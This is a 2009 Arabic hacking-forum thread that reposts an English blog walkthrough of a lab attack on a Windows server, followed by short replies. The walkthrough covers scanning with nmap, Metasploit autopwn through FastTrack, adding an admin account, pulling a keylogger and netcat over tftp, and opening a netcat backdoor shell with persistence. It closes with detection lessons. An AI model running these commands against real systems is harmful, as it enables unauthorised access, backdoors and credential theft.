:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   Penteration Testing Training (http://www.vbspiders.com/vb/forumdisplay.php?f=278)
-   -   Remote Exploitation (http://www.vbspiders.com/vb/showthread.php?t=15884)

NEVER HaCKEr 07-23-2009 01:57 AM

Remote Exploitation
 


السلام عليكم ورحمة الله وبركاته



==


الموضوع يتكلم عن مشروع الميتا سبوليت وثغرات الريموت التي تستغل بعدة طرق
metaspolit

Remote Exploitation
The purpose of this blog entry is to demonstrate how easy it is for an attacker to use freely available tools to exploit servers and gain root (administrative) access. I also look at how this attack might have been spotted from the defenders point of view and what could have been done to prevent it.

Tools

  • Backtrack3
  • TCPDump
  • Nmap
  • FastTrack
  • Netcat
Below I will list the steps I took to own the server, plant a keylogger and a backdoor, and then set up the backdoor. This is a very basic attack and my aim is to demonstrate how an attacker with a relatively low skill level can succeed in exploiting your box.

I'll be using FastTrack as my primary tool to gain root. FastTrack is kind of like a front-end for Metasploit, but it is quite automated and just throws all the exploits at a target and builds a nice database as it goes. So it is very noisy and has a greater chance of crashing the target. Once finished it lists the sessions ready for the attacker to connect to.


The Attack

1. I start up a sniffer to see whats about and I discover a host that may be fun to play with. This was done using TCPdump.

tcpdump -i eth0 -vv

http://1.bp.blogspot.com/_vZAp7b1QDw...00/tcpdump.jpg

2. On the discovered host I use nmap to verify the open ports and the listening services. I just let nmap use the default port list rather than specifying a range at this time.

nmap 192.168.2.2 -T 4 -sV -P0 -n

http://3.bp.blogspot.com/_vZAp7b1QDw.../s400/nmap.jpg

3. After loading up FastTrack I select the "External Hackin" option.

4. Next I select "Autopwn Metasploit Automated" & enter the IP of my target.

http://1.bp.blogspot.com/_vZAp7b1QDw...selections.jpg

5. I choose the database type of sqlite3. When prompted to update Metasploit I select "No" because i'm in a lab and i have no internet access. FastTrack goes to work and does it's noisy magic.

http://4.bp.blogspot.com/_vZAp7b1QDw...ck+at+work.jpg

6. FastTrack has found 2 vulnerabilities that it has successfully exploited. Using the sessions -l command I can see these listed.

http://4.bp.blogspot.com/_vZAp7b1QDw...0/sessions.jpg

7. I pick a session and use it to connect to the server and I use the "whoami" command to verify that I am logged in as a system account with admin privileges.

http://3.bp.blogspot.com/_vZAp7b1QDw...00/connect.jpg

8. I now go and add a new user and give the account admin rights using the "net user" and "net localgroup" commands.

net user synjunkie Password123 /add
net localgroup Administrators synjunkie /add

http://1.bp.blogspot.com/_vZAp7b1QDw...00/adduser.jpg

9. If I want a nice GUI I use RDP to connect to the host.

http://3.bp.blogspot.com/_vZAp7b1QDw...0/s400/rdp.jpg

And now i can begin to look around my target and if necessary set up other back doors.

http://4.bp.blogspot.com/_vZAp7b1QDw...s400/bingo.jpg


10. And if i want to get my tools onto the box to set the backdoor up or log keystrokes it's no problem. I set up a TFTP Server on my attacking box and use windows built in "tftp" command to pull across some tools.

tftp -i 192.168.2.1 GET klogger.exe
tftp -i 192.168.2.1 GET nc.exe

http://4.bp.blogspot.com/_vZAp7b1QDw.../s400/tftp.jpg


11. For my backdoor i create a netcat listener and shovel a shell back to whoever connects to it.

nc -p 6666 -L -e cmd.exe

http://2.bp.blogspot.com/_vZAp7b1QDw...400/owned1.jpg

To maintain access I could either use the "reg" command to create a registry entry to auto-start my backdoor at each reboot, or create a batch file and put it in the startup folder.

And on the attackers box I connect to my newly created backdoor.

nc 192.168.2.2 6666

http://3.bp.blogspot.com/_vZAp7b1QDw...0/backdoor.jpg


owned!

http://4.bp.blogspot.com/_vZAp7b1QDw...s400/owned.jpg


Detection & Lessons Learned

1. The Server was behind on it's patches. Patching is fundamental to securing a system.

2. The Server had loads of listening services. Were all these services necessary? if not shut them down.

3. A new account was added to an administrator group. The Administrators group should always be closely monitored for unathorised changes.

http://2.bp.blogspot.com/_vZAp7b1QDw...0/accounts.jpg

4. From analysing the logs this attack was very noisy and could have easily have been detected.

Below are screenprints of the ftp and web logs. It is evident from these that an attack has taken place.

http://3.bp.blogspot.com/_vZAp7b1QDw.../s400/logs.jpg

More tell-tale logs!

http://1.bp.blogspot.com/_vZAp7b1QDw...s400/logs1.jpg

And the screenshot below shows that unauthorised entry has occurred.

http://3.bp.blogspot.com/_vZAp7b1QDw...400/seclog.jpg

However, this is after the attack and the damage could have already been done. Any decent attacker will also modify or delete logs so setting up a syslog server that is hardened is a good idea. Most Admins will set up a syslog server not realising that it needs hardening, as it will be critical to you in the event of an attack and can provide valuable information to help you identify the source of the attack and also help you learn from it to better protect your systems in the future.




تقبلووو مروري

اخوكم
:a42:


NEVER HaCKEr



PASSEWORD 07-23-2009 02:16 AM

موضوع شيق و يحتاج بعض الوقت لقرائته كاملا
شكرا لك

NEVER HaCKEr 07-23-2009 02:17 AM

العفووو حبيبي ماسوينا شي

:41:

HACK@R AL BASR3H 07-23-2009 03:37 AM

مشككككككككككور حبيبي على الشرح

ابو بدر 07-23-2009 01:54 PM

شرح رائع
سلام

ViRuS_HiMa 10-28-2009 09:06 PM

فعلا اخي من افضل الشروحات اللي قرئتها عن التريكس او الخداع فقط لانه لم يتحدث عن الميتا سبلويت بطلاقه هو فقط فحص الايبي ووجد احد الخدمات التي يمكن استغلالها لاكن اكثر ما اعجبني في الموضوع هو حديثثه عن كيف تبقي علي الوندوز بوكس لاطول فتره من طرح باكدورز او وضع كود تعديل في الرجستري لتشغيل الباك دور الخاص به مع كل ريبوت للنظام

شكرا لك اخي علي الموضوع . وجزاك الله خيرا . وكاتب الموضوع كذلك .

NEVER HaCKEr 10-30-2009 07:36 PM

هلا فيك يازعيم فايروس هيما لوووووووووول منورنا بهالطله يازعيم خلينا نشوف ابداعك بالمنتدى يافايروس هيما

تقبلووووووووو مروري جميعا حبايبي وشاكرلكم على الرد الرائع ^^

KaLa$nikoV 08-10-2010 09:08 PM

والله لازمني دوره انجليزي ههههه


الساعة الآن 12:43 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0